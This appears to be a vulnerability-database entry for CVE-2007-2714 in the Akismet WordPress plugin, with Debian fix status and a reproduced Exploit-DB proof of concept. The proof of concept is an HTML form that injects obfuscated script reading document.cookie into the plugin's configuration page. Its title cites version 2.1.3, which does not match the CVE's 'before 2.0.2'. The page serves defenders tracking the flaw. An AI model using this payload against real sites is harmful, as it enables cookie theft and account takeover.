CVE-2007-2714
unknown
CVSS v3
—
CVSS v4 NEW
—
VIR risk
1.0
Description
Unspecified vulnerability in akismet.php in Matt Mullenweg Akismet before 2.0.2, a WordPress plugin, has unknown impact and attack vectors.
Predictions
Exploit likelihood
20%
Patch ETA
—
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.
✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
WordPress Plugin Akismet 2.1.3 - Cross-Site Scripting
<!--source: https://www.securityfocus.com/bid/23965/info
The WordPress Akismet plugin is prone to an unspecified vulnerability.
-->
<html> <body> <form action="http://www.example.com/wp-admin/plugins.php?page=akismet-key-config" method="post" id="akismet-conf"> <input name="_wpnonce" value="'" type="text"> <input name="_wp_http_referer" value="'%2522><script>eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105 ,101,41))</script>" type="text"> <input id="key" name="key" size="15" maxlength="12" value="1337"> <input name="submit" value="Update options »" type="submit"> </form> </body> </html>OS impact
Debian Fixed 5 releases
| Version | Status | Fixed in |
|---|---|---|
| trixie | Fixed | 2.2-1 |
| sid | Fixed | 2.2-1 |
| forky | Fixed | 2.2-1 |
| bullseye | Fixed | 2.2-1 |
| bookworm | Fixed | 2.2-1 |
References
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.